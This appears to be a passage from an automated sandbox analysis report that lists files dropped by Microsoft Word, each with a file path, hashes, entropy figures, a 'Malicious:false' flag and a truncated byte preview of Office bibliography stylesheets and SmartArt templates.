                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):333258
                                                                                    Entropy (8bit):4.654450340871081
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                    MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                    SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                    SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                    SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE381.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):328
                                                                                    Entropy (8bit):3.541819892045459
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                                                                                    MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                                                                                    SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                                                                                    SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                                                                                    SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE3A2.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):288
                                                                                    Entropy (8bit):3.523917709458511
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                                                                                    MD5:4A9A2E8DB82C90608C96008A5B6160EF
                                                                                    SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                                                                                    SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                                                                                    SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE3A2.tmp\chicago.xsl

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):296658
                                                                                    Entropy (8bit):5.000002997029767
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                    MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                    SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                    SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                    SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE3D4.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):254
                                                                                    Entropy (8bit):3.4845992218379616
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                                                                                    MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                                                                    SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                                                                    SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                                                                                    SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE3D4.tmp\HexagonRadial.glox

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):6024
                                                                                    Entropy (8bit):7.886254023824049
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                    MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                    SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                    SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                    SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                    Malicious:false
                                                                                    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE3EA.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):256
                                                                                    Entropy (8bit):3.4842773155694724
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                                                                                    MD5:923D406B2170497AD4832F0AD3403168
                                                                                    SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                                                                    SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                                                                    SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE3EA.tmp\ConvergingText.glox

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):11380
                                                                                    Entropy (8bit):7.891971054886943
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                    MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                    SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                    SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                    SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                    Malicious:false
                                                                                    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE450.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):286
                                                                                    Entropy (8bit):3.5502940710609354
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXfQICl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXClNGHmD0wbnKYZAH/lMZqiv
                                                                                    MD5:9B8D7EFE8A69E41CDC2439C38FE59FAF
                                                                                    SHA1:034D46BEC5E38E20E56DD905E2CA2F25AF947ED1
                                                                                    SHA-256:70042F1285C3CD91DDE8D4A424A5948AE8F1551495D8AF4612D59709BEF69DF2
                                                                                    SHA-512:E50BB0C68A33D35F04C75F05AD4598834FEC7279140B1BB0847FF39D749591B8F2A0C94DA4897AAF6C33C50C1D583A836B0376015851910A77604F8396C7EF3C
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE450.tmp\iso690.xsl

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):270198
                                                                                    Entropy (8bit):5.073814698282113
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                    MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                    SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                    SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                    SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE462.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):314
                                                                                    Entropy (8bit):3.5230842510951934
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                    MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                                                                                    SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                                                                                    SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                                                                                    SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE462.tmp\ieee2006officeonline.xsl

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):294178
                                                                                    Entropy (8bit):4.977758311135714
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                    MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                    SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                    SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                    SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE468.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):332
                                                                                    Entropy (8bit):3.547857457374301
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                    MD5:4EC6724CBBA516CF202A6BD17226D02C
                                                                                    SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                                                                                    SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                                                                                    SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE468.tmp\harvardanglia2008officeonline.xsl

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):284415
                                                                                    Entropy (8bit):5.00549404077789
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                    MD5:33A829B4893044E1851725F4DAF20271
                                                                                    SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                    SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                    SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE48F.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):264
                                                                                    Entropy (8bit):3.4866056878458096
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                                                                                    MD5:6C489D45F3B56845E68BE07EA804C698
                                                                                    SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                                                                                    SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                                                                                    SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE48F.tmp\ThemePictureAccent.glox

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):6448
                                                                                    Entropy (8bit):7.897260397307811
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                    MD5:42A840DC06727E42D42C352703EC72AA
                                                                                    SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                    SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                    SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                    Malicious:false
                                                                                    Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE490.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):286
                                                                                    Entropy (8bit):3.4670546921349774
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                                                                                    MD5:3D52060B74D7D448DC733FFE5B92CB52
                                                                                    SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
